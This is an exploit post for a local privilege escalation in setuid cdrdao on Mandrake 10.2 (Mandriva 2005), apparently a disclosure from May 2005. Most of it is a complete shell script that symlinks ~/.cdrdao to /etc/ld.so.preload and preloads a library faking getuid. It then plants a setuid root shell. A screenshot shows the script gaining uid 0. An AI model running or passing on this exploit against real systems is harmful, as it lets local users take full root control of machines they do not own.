cdrdao exploit for mandrake 10.2 ( Mandriva 2005)
Hi.
Seems cdrdao vulnerability still exist in Mandrake 10.2 (Mandriva 2005).
I've no idea why Mandrake always forgot to fix this vulnerability ...
Anyway, hope Mandrike will fix this vulnerability as soon as possible.
--- screenshot ---
[newbug@t43 ~]$ cat /etc/mandrake-release
Mandrakelinux release 10.2 (Limited Edition 2005) for i586
[newbug@t43 ~]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-7mdk
[newbug@t43 ~]$ ./cdrdao_exp.sh
cdrdao private exploit
This exploit only for Mandrake series
newbug [at] chroot.org
May 2005
checking if cdrdao is setuid ...
[+] done.
checking if /etc/ld.so.preload already exist ...
[+] done.
checking if ~/.cdrdao already exist ...
[+] done.
preparing hook library ...
[+] done.
preparing shell program ...
[+] done.
link .cdrdao ==> /etc/ld.so.preload ...
[+] done.
compile hook library ...
[+] done.
compile shell program ...
[+] done.
run cdrdao ...
[+] done.
checking if /etc/ld.so.preload created successful...
[+] done.
!@#$@%#$%#$%!@%^
[+] Congratulation, You win the game !!
[root@t43 tmp]# id
uid=0(root) gid=0(root) groups=500(newbug)
[root@t43 tmp]#
--- end of screenshot ---
--- cdrdao_exp.sh ---
#!/bin/sh
# cdrdao local root exploit
# newbug [at] chroot.org
# IRC: irc.chroot.org #chroot
# May 2005
echo "cdrdao private exploit"
echo "This exploit only for Mandrake series"
echo "newbug [at] chroot.org"
echo "May 2005"
echo "checking if cdrdao is setuid ...";
if [ ! -u /usr/bin/cdrdao ]; then
echo "[-] Failed";
exit
fi
echo "[+] done.";
echo "checking if /etc/ld.so.preload already exist ..."
if [ -f /etc/ld.so.preload ]; then
echo "[-] Failed."
exit
else
echo "[+] done."
fi
echo "checking if ~/.cdrdao already exist ..."
if [ -f ~/.cdrdao ]; then
rm -rf ~/.cdrdao
fi
echo "[+] done."
cd /tmp
echo "preparing hook library ..."
cat >ld.so.c<<EOF
#include <stdlib.h>
uid_t getuid()
{
return 0;
}
EOF
echo "[+] done."
echo "preparing shell program ..."
cat >sh.c <<EOF
#include <stdio.h>
#include <unistd.h>
int main(int argc,char **argv)
{
setreuid(0,0);
setgid(0);
unlink("/tmp/ld.so");
if(getuid())
{
printf("[-] Failed.\n");
unlink(argv[0]);
exit(0);
}
printf("[+] Congratulation, You win the game !!\n");
unlink("/etc/ld.so.preload");
execl("/bin/bash","bash",(char *)0);
return 0;
}
EOF
echo "[+] done."
echo "link .cdrdao ==> /etc/ld.so.preload ..."
ln -sf /etc/ld.so.preload ~/.cdrdao
echo "[+] done."
echo "compile hook library ..."
gcc -shared -o ld.so ld.so.c
echo "[+] done."
echo "compile shell program ..."
gcc -o sh sh.c
echo "[+] done."
umask 0
echo "run cdrdao ..."
cdrdao unlock --save >/dev/null 2>&1
echo "[+] done."
echo "checking if /etc/ld.so.preload created successful..."
if [ -f /etc/ld.so.preload ]; then
echo "[+] done."
else
echo "[-] Failed."
exit
fi
echo "/tmp/ld.so">/etc/ld.so.preload
rm -f /tmp/sh.c
rm -f /tmp/ld.so.c
su -c "chown root.root /tmp/sh;chmod 4755 /tmp/sh" >/dev/null 2>&1
echo "!@#\$@%#$%#$%!@%^"
/tmp/sh
--- end of cdrdao_exp.sh ---